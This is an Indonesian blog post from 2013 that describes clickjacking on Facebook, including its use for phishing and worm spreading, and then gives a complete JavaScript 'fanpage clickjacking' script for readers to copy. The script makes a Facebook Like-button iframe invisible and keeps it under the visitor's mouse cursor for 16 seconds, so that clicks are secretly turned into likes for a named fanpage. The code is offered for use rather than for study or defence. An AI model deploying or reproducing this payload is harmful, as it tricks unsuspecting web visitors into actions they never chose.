Kamis, 13 Juni 2013

Clickjacking fanspage 2

Sebuah teknik hack yang bisa digunakan untuk phishing (mencuri data pribadi) dan bisa juga untuk penyebaran worm dan worm ini akan menyebar dengan cepat di jejaring sosial itu.
Lewat clickjacking, hacker memancing pengguna Facebook untuk mengklik situs web yang berisi kode-kode berbahaya. Kode-kode itu nantinya akan mengambil alih akun, bahkan mengendalikan akun tersebut, seperti menambah teman, menghapus akun, instal aplikasi. Dan serangan clickjacking ini bukanlah yang pertama kalinya terjadi pada Facebook.
Kini pihak Facebook pun telah mengetahui dan mengembangkan cara untuk memblok/banned aksi clickjacking ini.
Banyak Cara untuk membuat Clickjacking di Facebook, buat contoh bikin Clickjacking Facebook Fanpage aja ya..
Contoh Script Clickjacking Facebook Fanpage :

<script type="text/javascript">
(function(){
 
  var Xcord = 0,
  Ycord = 0,
  IE = document.all ? true : false;
 
  if (!IE) document.captureEvents(Event.MOUSEMOVE);
 
  var lbox = document.createElement('iframe');
  lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/germy.blogspot') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
  lbox.scrolling = 'no';
  lbox.frameBorder = 0;
  lbox.allowTransparency = 'true';
  lbox.style.border = 0;
  lbox.style.overflow = 'hidden';
  lbox.style.cursor = 'pointer';
  lbox.style.width = '53px';
  lbox.style.height =  '23px';
  lbox.style.position = 'absolute';
  lbox.style.opacity = 0;
  document.getElementsByTagName('body')[0].appendChild(lbox);
 
  window.addEventListener('mousemove', mouseMove, false);
 
  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 16000);
 
  function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }
   
    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;
   
    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';
   
    return true
  }
})();
 
</script>


Sekian Dari Saya Dan Terima KAsih :)

1 komentar:

  1. ItuKan termasuk juga dengan virus kan
    tadi yang aku lihat ada bacaan hidden berarti sebagian ya dihilangkan ya

    BalasHapus